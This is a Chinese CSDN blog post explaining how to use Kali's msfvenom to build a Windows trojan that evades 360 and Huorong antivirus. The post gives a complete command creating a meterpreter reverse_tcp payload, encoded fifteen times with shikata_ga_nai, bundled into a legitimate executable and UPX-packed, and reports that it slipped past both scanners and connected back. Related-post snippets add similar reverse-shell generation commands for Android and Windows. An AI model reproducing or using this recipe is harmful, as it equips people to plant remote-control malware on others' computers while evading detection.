如何用kali制作一个木马绕过*60和火*

于 2024-07-13 21:16:40 发布
阅读量175 收藏 3
点赞数 6
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/idsjaduqw/article/details/140402896
版权

目录

木马的识别原理:

免杀木马的制作过程:

动态静态扫描测试:

总结:

木马的识别原理:

木马的扫描分为静态扫描和动态扫描,静态扫描是指杀软对木马与自己的病毒库进行比较判断是否为木马。动态扫描是对木马执行时的行为与病毒库的行为进行比较判断是否为木马。

免杀木马的制作过程:

首先我们要想绕过静态,最简单的方法就是直接用kali linux 中的msfvenom 进行编码多编几次就能过静态扫描了。我个人认为x86/shikata_ga_nai这个编码器挺好用的(但也得编码十几次)。最后在随便捆绑一个应用程序动静动能过。

msf的指令:msfvenom -p '合适的载荷' -x '捆绑程序名' -e x86/shikata_ga_nai -i '编码次数'  lhost='kali ip' -f '合适的文件类型'  -o '文件名' 

例子:

msfvenom -p windows/meterpreter/reverse_tcp -x kunbangchengxu.exe -e x86/shikata_ga_nai -i 15  lhost= 192.168.1.2 -f exe -o muma.exe

运行之后生成木马。用upx加壳

upx muma.exe

动态静态扫描测试:

用*60查杀,未发现木马病毒

用火*查杀

开启监听

运行木马之后完成连接(*60,火*未提示木马)

总结:

木马免杀需要对木马进行多次编译,并对一个拥有数字签名的程序进行捆绑。可以绕过*60(其他的软件没试过)

但由于各种病毒库一直在刷新所以说不定几天后就不免杀了,但方法一样。

momozsdf
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
分块绕过WAF.zip
02-27
这是一个绕过WAF的方法,大家能够学习到如何绕过的方法。能够提升自己的技术水品。
PE+KALI+U盘存储 三合一U盘制作工具共有6个
09-30
PE+KALI+U盘存储 三合一U盘制作工具共有6个,亲测可用。我自己制作一个liveU盘,可以持久化存储。即插即用,超级方便。
kali木马
m0_46633551的博客
04-07 956
kali简单木马(测试) 需要:kali系统 Android手机 U盘(数据线,蓝牙……) 转换头 你的智商 第一步:打开kali终端 查看直接的root权限,没有的话用sudo -i 第二步:msfvenom -p android/meterpreter/reverse_tcp LHOST=你的IP地址 LPOTR=4444(也可以是别的端口) R> Woodhouse. apk 如上...
2021Kali -- 木马免杀制作
qq_50854662的博客
09-12 5002
​知道为什么梦里的人都看不清脸么?因为怕你当真。。。 ----  网易云热评    一、通过MSF生成shellcode 1、启动MSF,演示版本是6.0.36 2、通过msfvenom生成相关代码 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x...
复现|使用Kali生成木马,渗透Windows系统
Maricopig的博客
05-13 1051
简单复现了使用kali中的msfvenom工具生成木马文件,并在靶机中执行后,展示后渗透阶段可操作内容。
kali制作木马并使用shellter免杀工具来实现更低的查杀率
最新发布
勤能补拙
05-29 962
Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。俗称为免杀。
木马免杀方式
Shinyhuang_的博客
01-05 6351
前言 免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。免杀的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。免杀技术也并不是十恶不赦的,例如,在软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件认为是木马病毒;一些安全领域中的部分安全检测产品,也会被杀毒软件误杀,这时就需要免杀技术来应对这些不稳定因素。 1、裸
kali木马 简易木马制作与应用
胡乱写点什么
06-24 4846
Kali——木马(一) 学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。 —— 简易木马制作与应用 —— 一.流程 首先确定靶机和攻击主机可以连通 利用msfvenom创建木马程序 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=xxx.xxx.xxx.xxx(攻击主机的ip) LPORT=xxx(攻击主机的端口) -f exe >p
VMWare安装Kali2021.4和XShell远程连接 最新版(详细一次搞定)
01-08
VMWare 安装 Kali 2021.4 和 XShell 远程连接 在这篇文章中,我们将详细介绍如何使用 VMWare 安装 Kali 2021.4 并配置 XShell 远程连接。以下是文章的详细内容: 虚拟机安装 Kali 2021.4 首先,需要安装好 VMWare...
Kali局域网嗅探和断网拦截
08-31
Kali Linux 中,我们可以使用各种工具来嗅探和拦截局域网中的流量。下面我们将介绍如何使用 Kali Linux 实现局域网嗅探和断网拦截。 一、获取本机 IP 和网卡信息 在开始嗅探和拦截之前,我们需要先获取本机的 ...
计网大作业-Kali制作调用网站-详细
05-30
Kali Linux作为一个专门针对网络安全和渗透测试的操作系统,内置了大量的工具,包括用于制作钓鱼网站的工具。在制作钓鱼网站的过程中,Kali Linux提供了以下步骤: 1. **安装Kali Linux**:首先,需要从官方网站...
网络安全技术新手入门 利用Kali Linux生成简单的远程控制木马_kali生成远程
2401_84263434的博客
05-02 1163
输入命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.147 lport=9999 -f exe -o MyDemo.exe参数含义:-p:payload -f:format -o:output运行结果如下:查看病毒:1.关闭杀毒程序杀毒程序包括一些杀毒软件以及电脑本身的防毒程序因为杀毒软件五花八门所以读者门自行研究关闭,这里只演示电脑本身的杀毒程序的关闭tips:新手阶段一般都用windows
网络安全技术新手入门:利用Kali Linux生成简单的远程控制木马
weixin_56154577的博客
01-08 5343
本文对木马的生成过程讲的比较详细,适合对网络安全技术感兴趣的小伙伴们,读完本文之后,读者可以对木马的形成、传播、对靶机的控制流程有一个逻辑性的理解
使用KALI生成木马病毒实现远程控制
小司机的奥拓
12-25 3451
该文章内容仅用于学习使用Kali Linux系统,请不要将它用于非法的途径,如有意外概不负责。我将会详细介绍使用Kali Linux系统生成木马并用它远程控制一台处在外网的物理计算机,使用到的工具有:1、VMware Workstation Pro 16(虚拟机)下载地址:https://www.vmware.com/cn/products/workstation-pro/workstation-pro-evaluation.html2、Kali Linux 2021(系统)
关于内网穿透真实案例讲解
qq_36585338的博客
02-13 864
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 Kali 0x006内网穿透—数据转发 ​ GitHub - shellfeel/Ant-AntV: 一个经过实战考验的免杀程序生成器 MSF监听会话
Kali生成windows木马程序
qq_51950323的博客
09-07 9779
此文章为kali生成windows木马程序,进行的后渗透测试。此操作仅供虚拟机测试,请勿使用于非法途径。
kali制作绕过绒检测的木马(仅通过MSF的方式)
qq_50854662的博客
02-14 3298
kali制作绕过绒检测的木马(仅通过MSF的方式)
kaliwin10免杀
h1825819493的博客
06-09 481
在查看配置的时候Required中写yes的都是需要进行配置的,有的是默认配置好的,但是也可以进行更改。对生成的马进行签名。新建一个文件夹,把签名用的python程序放在文件夹,在把生成的马放进去。生成win10免杀马,用360绒是识别不出来的(不能再win11下运行)windows隐藏绑定外壳。
如何使用kali的msf制作木马
06-10
我很抱歉,我不能回答如何使用Kali的Metasploit Framework(MSF)制作木马的问题,因为这涉及到违法和不道德的行为。MSF是一个用于漏洞测试和渗透测试的工具,但其目的是帮助安全专业人员和网络管理员保护网络安全,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值